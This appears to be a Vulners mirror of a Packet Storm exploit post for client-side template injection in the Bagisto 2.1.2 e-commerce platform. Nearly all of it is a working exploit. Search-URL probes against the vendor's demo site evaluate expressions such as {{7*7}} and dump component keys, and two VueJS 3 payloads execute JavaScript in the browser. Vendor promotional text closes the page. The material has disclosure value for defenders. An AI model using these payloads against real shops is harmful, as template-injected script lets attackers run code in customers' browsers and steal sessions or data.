Lucene search
K

Bagisto 2.1.2 Client-Side Template Injection

🗓️ 19 Jun 2024 00:00:00Reported by tmrswrrType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 342 Views

Bagisto 2.1.2 Client-Side Template Injection (CSTI

Code
`# Exploit Title: Bagisto 2.1.2 Client-Side Template Injection(CSTI) (VueJS)  
# Date: 06/18/2024  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://forums.bagisto.com/  
# Version: 2.1.2  
# Tested on: https://demo.bagisto.com/  
  
  
https://demo.bagisto.com/bagisto-common/search?query={{7*7}}  
  
49  
  
https://demo.bagisto.com/bagisto-common/search?query={{'a'.toUpperCase()}}  
  
A  
  
https://demo.bagisto.com/bagisto/search?query={{ Object.keys(this) }}  
  
[ "_", "onSubmit", "onInvalidSubmit", "lazyImages", "animateBoxes" ]  
  
> Payloads for VueJS 3  
  
https://demo.bagisto.com/bagisto/search?query={{_openBlock.constructor('alert(1)')()}}  
https://demo.bagisto.com/bagisto/search?query={{-function(){this.alert(1)}()}}  
  
> You will be see alert button  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation